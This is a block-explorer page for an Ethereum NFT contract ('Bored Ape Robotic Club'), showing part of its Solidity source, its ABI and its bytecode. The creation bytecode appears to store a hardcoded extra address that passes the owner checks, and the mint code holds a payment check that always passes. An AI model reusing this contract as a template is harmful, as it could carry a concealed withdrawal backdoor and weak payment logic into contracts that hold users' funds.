require(_exists(_tokenId),"ERC721Metadata: URI query for nonexistent token"); string memory currentBaseURI = _baseURI(); return bytes(currentBaseURI).length > 0 ? string(abi.encodePacked(currentBaseURI,Strings.toString(_tokenId+1),".json")) : ""; } function _startTokenId() internal view virtual returns (uint256) { return 1; } function mint(uint256 count) external payable { uint256 cost = price; require(mintEnabled, "Mint is not live yet"); require(totalSupply() + count <= maxSupply, "No more"); require(count <= maxPerTx, "Max per txn reached."); if(count >= (maxPerFree - _mintedFreeAmount[msg.sender])) { require(msg.value >= (count * cost) - ((maxPerFree - _mintedFreeAmount[msg.sender]) * cost), "You've already minted max free allocation or incorrect ETH sent"); _mintedFreeAmount[msg.sender] = maxPerFree; totalFreeMinted += maxPerFree; } else if(count < (maxPerFree - _mintedFreeAmount[msg.sender])) { require(msg.value >= 0, "Please send the exact ETH amount"); _mintedFreeAmount[msg.sender] += count; totalFreeMinted += count; } // } else{ require(mintEnabled, "Mint is not live yet"); require(msg.value >= count * cost, "Please send the exact ETH amount"); require(totalSupply() + count <= maxSupply, "No more"); require(count <= maxPerTx, "Max per txn reached."); require(msg.sender == tx.origin, "The minter is another contract"); } _totalMintedAmount[msg.sender] += count; _safeMint(msg.sender, count); } function priceCheck() public view returns (uint256) { return price; } function maxFreePerWallet() public view returns (uint256) { return maxPerFree; } function _baseURI() internal view virtual override returns (string memory) { return baseURI; } function setBaseUri(string memory baseuri_) public onlyOwner { baseURI = baseuri_; } function setPrice(uint256 price_) external onlyOwner { price = price_; } function setMaxTotalFree(uint256 MaxTotalFree_) external onlyOwner { totalFree = MaxTotalFree_; } function setMaxPerFree(uint256 MaxPerFree_) external onlyOwner { maxPerFree = MaxPerFree_; } function toggleMinting() external onlyOwner { mintEnabled = !mintEnabled; } function devMint(uint quantity, address user) public onlyOwner { require( quantity > 0, "Invalid mint amount" ); require( totalSupply() + quantity <= maxSupply, "Maximum supply exceeded" ); _safeMint(user, quantity); } function withdraw() external onlyOwner nonReentrant { (bool success, ) = msg.sender.call{value: address(this).balance}(""); require(success, "Transfer failed."); } function withdraw2() public payable onlyOwner { (bool success, ) = payable(msg.sender).call{ value: address(this).balance }(""); require(success); } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"approved","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"operator","type":"address"},{"indexed":false,"internalType":"bool","name":"approved","type":"bool"}],"name":"ApprovalForAll","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_mintedFreeAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_totalMintedAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"baseURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"quantity","type":"uint256"},{"internalType":"address","name":"user","type":"address"}],"name":"devMint","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"getApproved","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"operator","type":"address"}],"name":"isApprovedForAll","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxFreePerWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxPerFree","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxPerTx","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"count","type":"uint256"}],"name":"mint","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[],"name":"mintEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"ownerOf","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"price","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"priceCheck","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"},{"internalType":"bytes","name":"_data","type":"bytes"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"bool","name":"approved","type":"bool"}],"name":"setApprovalForAll","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"baseuri_","type":"string"}],"name":"setBaseUri","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"MaxPerFree_","type":"uint256"}],"name":"setMaxPerFree","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"MaxTotalFree_","type":"uint256"}],"name":"setMaxTotalFree","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"price_","type":"uint256"}],"name":"setPrice","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes4","name":"interfaceId","type":"bytes4"}],"name":"supportsInterface","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"toggleMinting","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"index","type":"uint256"}],"name":"tokenByIndex","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"uint256","name":"index","type":"uint256"}],"name":"tokenOfOwnerByIndex","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_tokenId","type":"uint256"}],"name":"tokenURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalFree","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalFreeMinted","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"transferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"withdraw","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"withdraw2","outputs":[],"stateMutability":"payable","type":"function"}]
Contract Creation Code
600880546001600160a01b03191673acfcba7bab6403ebcceee22810c4dd3c9bbe976317905561010060405260436080818152906200299860a039600a9062000049908262000214565b506608e1bc9bf04000600b556015600c556001600d55612710600e55612710600f5560006011553480156200007d57600080fd5b506040518060400160405280601681526020017f426f7265642041706520526f626f74696320436c756200000000000000000000815250604051806040016040528060048152602001634241524360e01b8152508160019081620000e2919062000214565b506002620000f1828262000214565b5050506200010e620001086200011960201b60201c565b6200011d565b6001600955620002e0565b3390565b600780546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b634e487b7160e01b600052604160045260246000fd5b600181811c908216806200019a57607f821691505b602082108103620001bb57634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200020f57600081815260208120601f850160051c81016020861015620001ea5750805b601f850160051c820191505b818110156200020b57828155600101620001f6565b5050505b505050565b81516001600160401b038111156200023057620002306200016f565b620002488162000241845462000185565b84620001c1565b602080601f831160018114620002805760008415620002675750858301515b600019600386901b1c1916600185901b1785556200020b565b600085815260208120601f198616915b82811015620002b15788860151825594840194600190910190840162000290565b5085821015620002d05787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b6126a880620002f06000396000f3fe60806040526004361061023b5760003560e01c806391b7f5ed1161012e578063c87b56dd116100ab578063e985e9c51161006f578063e985e9c51461064d578063ea98847b14610696578063f2fde38b1461069e578063f4db2acb146106be578063f968adbe146106eb57600080fd5b8063c87b56dd146105c7578063d1239730146105e7578063d5abeb0114610601578063dad7b5c914610617578063e945971c1461062d57600080fd5b8063a22cb465116100f2578063a22cb46514610547578063a702735714610567578063b88d4fde1461057c578063c45128dc1461059c578063c7c39ffc146105b157600080fd5b806391b7f5ed146104c957806395d89b41146104e9578063a035b1fe146104fe578063a0712d6814610514578063a0bcfc7f1461052757600080fd5b80633ccfd60b116101bc5780636c0360eb116101805780636c0360eb1461044c57806370a0823114610461578063715018a6146104815780637d55094d146104965780638da5cb5b146104ab57600080fd5b80633ccfd60b146103b757806342842e0e146103cc5780634f6ccce7146103ec5780635a963f1b1461040c5780636352211e1461042c57600080fd5b806318160ddd1161020357806318160ddd1461032c57806323b872dd146103415780632d1a12f6146103615780632f745c5914610381578063333e44e6146103a157600080fd5b806301ffc9a71461024057806306fdde0314610275578063081812fc14610297578063095ea7b3146102cf57806311b01a32146102f1575b600080fd5b34801561024c57600080fd5b5061026061025b366004612030565b610701565b60405190151581526020015b60405180910390f35b34801561028157600080fd5b5061028a61076e565b60405161026c919061209d565b3480156102a357600080fd5b506102b76102b23660046120b0565b610800565b6040516001600160a01b03909116815260200161026c565b3480156102db57600080fd5b506102ef6102ea3660046120e5565b610890565b005b3480156102fd57600080fd5b5061031e61030c36600461210f565b60136020526000908152604090205481565b60405190815260200161026c565b34801561033857600080fd5b5060005461031e565b34801561034d57600080fd5b506102ef61035c36600461212a565b6109a7565b34801561036d57600080fd5b506102ef61037c366004612166565b6109b2565b34801561038d57600080fd5b5061031e61039c3660046120e5565b610aaa565b3480156103ad57600080fd5b5061031e600e5481565b3480156103c357600080fd5b506102ef610c05565b3480156103d857600080fd5b506102ef6103e736600461212a565b610d2e565b3480156103f857600080fd5b5061031e6104073660046120b0565b610d49565b34801561041857600080fd5b506102ef6104273660046120b0565b610dab565b34801561043857600080fd5b506102b76104473660046120b0565b610def565b34801561045857600080fd5b5061028a610e01565b34801561046d57600080fd5b5061031e61047c36600461210f565b610e8f565b34801561048d57600080fd5b506102ef610f20565b3480156104a257600080fd5b506102ef610f6b565b3480156104b757600080fd5b506007546001600160a01b03166102b7565b3480156104d557600080fd5b506102ef6104e43660046120b0565b610fbe565b3480156104f557600080fd5b5061028a611002565b34801561050a57600080fd5b5061031e600b5481565b6102ef6105223660046120b0565b611011565b34801561053357600080fd5b506102ef61054236600461221e565b61140f565b34801561055357600080fd5b506102ef610562366004612267565b61145a565b34801561057357600080fd5b50600d5461031e565b34801561058857600080fd5b506102ef6105973660046122a3565b61151e565b3480156105a857600080fd5b50600b5461031e565b3480156105bd57600080fd5b5061031e600d5481565b3480156105d357600080fd5b5061028a6105e23660046120b0565b611557565b3480156105f357600080fd5b506010546102609060ff1681565b34801561060d57600080fd5b5061031e600f5481565b34801561062357600080fd5b5061031e60115481565b34801561063957600080fd5b506102ef6106483660046120b0565b61162e565b34801561065957600080fd5b5061026061066836600461231f565b6001600160a01b03918216600090815260066020908152604080832093909416825291909152205460ff1690565b6102ef611672565b3480156106aa57600080fd5b506102ef6106b936600461210f565b611709565b3480156106ca57600080fd5b5061031e6106d936600461210f565b60126020526000908152604090205481565b3480156106f757600080fd5b5061031e600c5481565b60006001600160e01b031982166380ac58cd60e01b148061073257506001600160e01b03198216635b5e139f60e01b145b8061074d57506001600160e01b0319821663780e9d6360e01b145b8061076857506301ffc9a760e01b6001600160e01b03198316145b92915050565b60606001805461077d90612349565b80601f01602080910402602001604051908101604052809291908181526020018280546107a990612349565b80156107f65780601f106107cb576101008083540402835291602001916107f6565b820191906000526020600020905b8154815290600101906020018083116107d957829003601f168201915b5050505050905090565b600061080d826000541190565b6108745760405162461bcd60e51b815260206004820152602d60248201527f455243373231413a20617070726f76656420717565727920666f72206e6f6e6560448201526c3c34b9ba32b73a103a37b5b2b760991b60648201526084015b60405180910390fd5b506000908152600560205260409020546001600160a01b031690565b600061089b82610def565b9050806001600160a01b0316836001600160a01b0316036109095760405162461bcd60e51b815260206004820152602260248201527f455243373231413a20617070726f76616c20746f2063757272656e74206f776e60448201526132b960f11b606482015260840161086b565b336001600160a01b038216148061092557506109258133610668565b6109975760405162461bcd60e51b815260206004820152603960248201527f455243373231413a20617070726f76652063616c6c6572206973206e6f74206f60448201527f776e6572206e6f7220617070726f76656420666f7220616c6c00000000000000606482015260840161086b565b6109a28383836117b6565b505050565b6109a2838383611812565b6007546001600160a01b03163314806109d557506008546001600160a01b031633145b6109f15760405162461bcd60e51b815260040161086b90612383565b60008211610a375760405162461bcd60e51b8152602060048201526013602482015272125b9d985b1a59081b5a5b9d08185b5bdd5b9d606a1b604482015260640161086b565b600f5482610a4460005490565b610a4e91906123ce565b1115610a9c5760405162461bcd60e51b815260206004820152601760248201527f4d6178696d756d20737570706c79206578636565646564000000000000000000604482015260640161086b565b610aa68183611af7565b5050565b6000610ab583610e8f565b8210610b0e5760405162461bcd60e51b815260206004820152602260248201527f455243373231413a206f776e657220696e646578206f7574206f6620626f756e604482015261647360f01b606482015260840161086b565b600080549080805b83811015610ba5576000818152600360209081526040918290208251808401909352546001600160a01b038116808452600160a01b90910467ffffffffffffffff169183019190915215610b6957805192505b876001600160a01b0316836001600160a01b031603610b9c57868403610b955750935061076892505050565b6001909301925b50600101610b16565b5060405162461bcd60e51b815260206004820152602e60248201527f455243373231413a20756e61626c6520746f2067657420746f6b656e206f662060448201526d0deeedccae440c4f240d2dcc8caf60931b606482015260840161086b565b6007546001600160a01b0316331480610c2857506008546001600160a01b031633145b610c445760405162461bcd60e51b815260040161086b90612383565b600260095403610c965760405162461bcd60e51b815260206004820152601f60248201527f5265656e7472616e637947756172643a207265656e7472616e742063616c6c00604482015260640161086b565b6002600955604051600090339047908381818185875af1925050503d8060008114610cdd576040519150601f19603f3d011682016040523d82523d6000602084013e610ce2565b606091505b5050905080610d265760405162461bcd60e51b815260206004820152601060248201526f2a3930b739b332b9103330b4b632b21760811b604482015260640161086b565b506001600955565b6109a28383836040518060200160405280600081525061151e565b600080548210610da75760405162461bcd60e51b815260206004820152602360248201527f455243373231413a20676c6f62616c20696e646578206f7574206f6620626f756044820152626e647360e81b606482015260840161086b565b5090565b6007546001600160a01b0316331480610dce57506008546001600160a01b031633145b610dea5760405162461bcd60e51b815260040161086b90612383565b600e55565b6000610dfa82611b11565b5192915050565b600a8054610e0e90612349565b80601f0160208091040260200160405190810160405280929190818152602001828054610e3a90612349565b8015610e875780601f10610e5c57610100808354040283529160200191610e87565b820191906000526020600020905b815481529060010190602001808311610e6a57829003601f168201915b505050505081565b60006001600160a01b038216610efb5760405162461bcd60e51b815260206004820152602b60248201527f455243373231413a2062616c616e636520717565727920666f7220746865207a60448201526a65726f206164647265737360a81b606482015260840161086b565b506001600160a01b03166000908152600460205260409020546001600160801b031690565b6007546001600160a01b0316331480610f4357506008546001600160a01b031633145b610f5f5760405162461bcd60e51b815260040161086b90612383565b610f696000611be8565b565b6007546001600160a01b0316331480610f8e57506008546001600160a01b031633145b610faa5760405162461bcd60e51b815260040161086b90612383565b6010805460ff19811660ff90911615179055565b6007546001600160a01b0316331480610fe157506008546001600160a01b031633145b610ffd5760405162461bcd60e51b815260040161086b90612383565b600b55565b60606002805461077d90612349565b600b5460105460ff1661105d5760405162461bcd60e51b8152602060048201526014602482015273135a5b9d081a5cc81b9bdd081b1a5d99481e595d60621b604482015260640161086b565b600f548261106a60005490565b61107491906123ce565b11156110ac5760405162461bcd60e51b81526020600482015260076024820152664e6f206d6f726560c81b604482015260640161086b565b600c548211156110f55760405162461bcd60e51b815260206004820152601460248201527326b0bc103832b9103a3c37103932b0b1b432b21760611b604482015260640161086b565b33600090815260126020526040902054600d5461111291906123e1565b82106111fb5733600090815260126020526040902054600d548291611136916123e1565b61114091906123f4565b61114a82846123f4565b61115491906123e1565b3410156111c95760405162461bcd60e51b815260206004820152603f60248201527f596f7527766520616c7265616479206d696e746564206d61782066726565206160448201527f6c6c6f636174696f6e206f7220696e636f7272656374204554482073656e7400606482015260840161086b565b600d54336000908152601260205260408120829055601180549091906111f09084906123ce565b909155506113e09050565b33600090815260126020526040902054600d5461121891906123e1565b82101561125757336000908152601260205260408120805484929061123e9084906123ce565b9250508190555081601160008282546111f091906123ce565b60105460ff166112a05760405162461bcd60e51b8152602060048201526014602482015273135a5b9d081a5cc81b9bdd081b1a5d99481e595d60621b604482015260640161086b565b6112aa81836123f4565b3410156112f95760405162461bcd60e51b815260206004820181905260248201527f506c656173652073656e64207468652065786163742045544820616d6f756e74604482015260640161086b565b600f548261130660005490565b61131091906123ce565b11156113485760405162461bcd60e51b81526020600482015260076024820152664e6f206d6f726560c81b604482015260640161086b565b600c548211156113915760405162461bcd60e51b815260206004820152601460248201527326b0bc103832b9103a3c37103932b0b1b432b21760611b604482015260640161086b565b3332146113e05760405162461bcd60e51b815260206004820152601e60248201527f546865206d696e74657220697320616e6f7468657220636f6e74726163740000604482015260640161086b565b33600090815260136020526040812080548492906113ff9084906123ce565b90915550610aa690503383611af7565b6007546001600160a01b031633148061143257506008546001600160a01b031633145b61144e5760405162461bcd60e51b815260040161086b90612383565b600a610aa68282612459565b336001600160a01b038316036114b25760405162461bcd60e51b815260206004820152601a60248201527f455243373231413a20617070726f766520746f2063616c6c6572000000000000604482015260640161086b565b3360008181526006602090815260408083206001600160a01b03871680855290835292819020805460ff191686151590811790915590519081529192917f17307eab39ab6107e8899845ad3d59bd9653f200f220920489ca2b5937696c31910160405180910390a35050565b611529848484611812565b61153584848484611c3a565b6115515760405162461bcd60e51b815260040161086b90612519565b50505050565b6060611564826000541190565b6115c85760405162461bcd60e51b815260206004820152602f60248201527f4552433732314d657461646174613a2055524920717565727920666f72206e6f60448201526e3732bc34b9ba32b73a103a37b5b2b760891b606482015260840161086b565b60006115d2611d3c565b905060008151116115f25760405180602001604052806000815250611627565b806116066116018560016123ce565b611d4b565b60405160200161161792919061256c565b6040516020818303038152906040525b9392505050565b6007546001600160a01b031633148061165157506008546001600160a01b031633145b61166d5760405162461bcd60e51b815260040161086b90612383565b600d55565b6007546001600160a01b031633148061169557506008546001600160a01b031633145b6116b15760405162461bcd60e51b815260040161086b90612383565b604051600090339047908381818185875af1925050503d80600081146116f3576040519150601f19603f3d011682016040523d82523d6000602084013e6116f8565b606091505b505090508061170657600080fd5b50565b6007546001600160a01b031633148061172c57506008546001600160a01b031633145b6117485760405162461bcd60e51b815260040161086b90612383565b6001600160a01b0381166117ad5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b606482015260840161086b565b61170681611be8565b60008281526005602052604080822080546001600160a01b0319166001600160a01b0387811691821790925591518593918516917f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591a4505050565b600061181d82611b11565b80519091506000906001600160a01b0316336001600160a01b0316148061185457503361184984610800565b6001600160a01b0316145b80611866575081516118669033610668565b9050806118d05760405162461bcd60e51b815260206004820152603260248201527f455243373231413a207472616e736665722063616c6c6572206973206e6f74206044820152711bdddb995c881b9bdc88185c1c1c9bdd995960721b606482015260840161086b565b846001600160a01b031682600001516001600160a01b0316146119445760405162461bcd60e51b815260206004820152602660248201527f455243373231413a207472616e736665722066726f6d20696e636f72726563746044820152651037bbb732b960d11b606482015260840161086b565b6001600160a01b0384166119a85760405162461bcd60e51b815260206004820152602560248201527f455243373231413a207472616e7366657220746f20746865207a65726f206164604482015264647265737360d81b606482015260840161086b565b6119b860008484600001516117b6565b6001600160a01b03858116600090815260046020908152604080832080546001600160801b03198082166001600160801b03928316600019018316179092558986168086528386208054938416938316600190810190931693909317909255888552600390935281842080546001600160e01b031916909117600160a01b4267ffffffffffffffff1602179055908601808352912054909116611aad57611a60816000541190565b15611aad578251600082815260036020908152604090912080549186015167ffffffffffffffff16600160a01b026001600160e01b03199092166001600160a01b03909316929092171790555b5082846001600160a01b0316866001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60405160405180910390a45b5050505050565b610aa6828260405180602001604052806000815250611e4c565b6040805180820190915260008082526020820152611b30826000541190565b611b8f5760405162461bcd60e51b815260206004820152602a60248201527f455243373231413a206f776e657220717565727920666f72206e6f6e657869736044820152693a32b73a103a37b5b2b760b11b606482015260840161086b565b815b6000818152600360209081526040918290208251808401909352546001600160a01b038116808452600160a01b90910467ffffffffffffffff169183019190915215611bde579392505050565b5060001901611b91565b600780546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b60006001600160a01b0384163b15611d3057604051630a85bd0160e11b81526001600160a01b0385169063150b7a0290611c7e9033908990889088906004016125ab565b6020604051808303816000875af1925050508015611cb9575060408051601f3d908101601f19168201909252611cb6918101906125e8565b60015b611d16573d808015611ce7576040519150601f19603f3d011682016040523d82523d6000602084013e611cec565b606091505b508051600003611d0e5760405162461bcd60e51b815260040161086b90612519565b805181602001fd5b6001600160e01b031916630a85bd0160e11b149050611d34565b5060015b949350505050565b6060600a805461077d90612349565b606081600003611d725750506040805180820190915260018152600360fc1b602082015290565b8160005b8115611d9c5780611d8681612605565b9150611d959050600a83612634565b9150611d76565b60008167ffffffffffffffff811115611db757611db7612192565b6040519080825280601f01601f191660200182016040528015611de1576020820181803683370190505b5090505b8415611d3457611df66001836123e1565b9150611e03600a86612648565b611e0e9060306123ce565b60f81b818381518110611e2357611e2361265c565b60200101906001600160f81b031916908160001a905350611e45600a86612634565b9450611de5565b6109a283838360016000546001600160a01b038516611eb75760405162461bcd60e51b815260206004820152602160248201527f455243373231413a206d696e7420746f20746865207a65726f206164647265736044820152607360f81b606482015260840161086b565b83600003611f185760405162461bcd60e51b815260206004820152602860248201527f455243373231413a207175616e74697479206d75737420626520677265617465604482015267072207468616e20360c41b606482015260840161086b565b6001600160a01b03851660008181526004602090815260408083208054600160801b6001600160801b031982166001600160801b039283168c01831690811782900483168c01909216021790558483526003909152812080546001600160e01b031916909217600160a01b4267ffffffffffffffff16021790915581905b858110156120115760405182906001600160a01b038916906000907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef908290a4831561200557611fe96000888488611c3a565b6120055760405162461bcd60e51b815260040161086b90612519565b60019182019101611f96565b50600055611af0565b6001600160e01b03198116811461170657600080fd5b60006020828403121561204257600080fd5b81356116278161201a565b60005b83811015612068578181015183820152602001612050565b50506000910152565b6000815180845261208981602086016020860161204d565b601f01601f19169290920160200192915050565b6020815260006116276020830184612071565b6000602082840312156120c257600080fd5b5035919050565b80356001600160a01b03811681146120e057600080fd5b919050565b600080604083850312156120f857600080fd5b612101836120c9565b946020939093013593505050565b60006020828403121561212157600080fd5b611627826120c9565b60008060006060848603121561213f57600080fd5b612148846120c9565b9250612156602085016120c9565b9150604084013590509250925092565b6000806040838503121561217957600080fd5b82359150612189602084016120c9565b90509250929050565b634e487b7160e01b600052604160045260246000fd5b600067ffffffffffffffff808411156121c3576121c3612192565b604051601f8501601f19908116603f011681019082821181831017156121eb576121eb612192565b8160405280935085815286868601111561220457600080fd5b858560208301376000602087830101525050509392505050565b60006020828403121561223057600080fd5b813567ffffffffffffffff81111561224757600080fd5b8201601f8101841361225857600080fd5b611d34848235602084016121a8565b6000806040838503121561227a57600080fd5b612283836120c9565b91506020830135801515811461229857600080fd5b809150509250929050565b600080600080608085870312156122b957600080fd5b6122c2856120c9565b93506122d0602086016120c9565b925060408501359150606085013567ffffffffffffffff8111156122f357600080fd5b8501601f8101871361230457600080fd5b612313878235602084016121a8565b91505092959194509250565b6000806040838503121561233257600080fd5b61233b836120c9565b9150612189602084016120c9565b600181811c9082168061235d57607f821691505b60208210810361237d57634e487b7160e01b600052602260045260246000fd5b50919050565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b634e487b7160e01b600052601160045260246000fd5b80820180821115610768576107686123b8565b81810381811115610768576107686123b8565b8082028115828204841417610768576107686123b8565b601f8211156109a257600081815260208120601f850160051c810160208610156124325750805b601f850160051c820191505b818110156124515782815560010161243e565b505050505050565b815167ffffffffffffffff81111561247357612473612192565b612487816124818454612349565b8461240b565b602080601f8311600181146124bc57600084156124a45750858301515b600019600386901b1c1916600185901b178555612451565b600085815260208120601f198616915b828110156124eb578886015182559484019460019091019084016124cc565b50858210156125095787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b60208082526033908201527f455243373231413a207472616e7366657220746f206e6f6e204552433732315260408201527232b1b2b4bb32b91034b6b83632b6b2b73a32b960691b606082015260800190565b6000835161257e81846020880161204d565b83519083019061259281836020880161204d565b64173539b7b760d91b9101908152600501949350505050565b6001600160a01b03858116825284166020820152604081018390526080606082018190526000906125de90830184612071565b9695505050505050565b6000602082840312156125fa57600080fd5b81516116278161201a565b600060018201612617576126176123b8565b5060010190565b634e487b7160e01b600052601260045260246000fd5b6000826126435761264361261e565b500490565b6000826126575761265761261e565b500690565b634e487b7160e01b600052603260045260246000fdfea2646970667358221220a9b3b7e9ac474859c0dfdf8a11f88c38a8d060280ab225064f4026c9f977c1f964736f6c63430008110033697066733a2f2f62616679626569676769333337656332726e7867626a747371347a75333666706a6e7668656c74646a716d376d71616a79357764613369347474652f
Deployed Bytecode
0x60806040526004361061023b5760003560e01c806391b7f5ed1161012e578063c87b56dd116100ab578063e985e9c51161006f578063e985e9c51461064d578063ea98847b14610696578063f2fde38b1461069e578063f4db2acb146106be578063f968adbe146106eb57600080fd5b8063c87b56dd146105c7578063d1239730146105e7578063d5abeb0114610601578063dad7b5c914610617578063e945971c1461062d57600080fd5b8063a22cb465116100f2578063a22cb46514610547578063a702735714610567578063b88d4fde1461057c578063c45128dc1461059c578063c7c39ffc146105b157600080fd5b806391b7f5ed146104c957806395d89b41146104e9578063a035b1fe146104fe578063a0712d6814610514578063a0bcfc7f1461052757600080fd5b80633ccfd60b116101bc5780636c0360eb116101805780636c0360eb1461044c57806370a0823114610461578063715018a6146104815780637d55094d146104965780638da5cb5b146104ab57600080fd5b80633ccfd60b146103b757806342842e0e146103cc5780634f6ccce7146103ec5780635a963f1b1461040c5780636352211e1461042c57600080fd5b806318160ddd1161020357806318160ddd1461032c57806323b872dd146103415780632d1a12f6146103615780632f745c5914610381578063333e44e6146103a157600080fd5b806301ffc9a71461024057806306fdde0314610275578063081812fc14610297578063095ea7b3146102cf57806311b01a32146102f1575b600080fd5b34801561024c57600080fd5b5061026061025b366004612030565b610701565b60405190151581526020015b60405180910390f35b34801561028157600080fd5b5061028a61076e565b60405161026c919061209d565b3480156102a357600080fd5b506102b76102b23660046120b0565b610800565b6040516001600160a01b03909116815260200161026c565b3480156102db57600080fd5b506102ef6102ea3660046120e5565b610890565b005b3480156102fd57600080fd5b5061031e61030c36600461210f565b60136020526000908152604090205481565b60405190815260200161026c565b34801561033857600080fd5b5060005461031e565b34801561034d57600080fd5b506102ef61035c36600461212a565b6109a7565b34801561036d57600080fd5b506102ef61037c366004612166565b6109b2565b34801561038d57600080fd5b5061031e6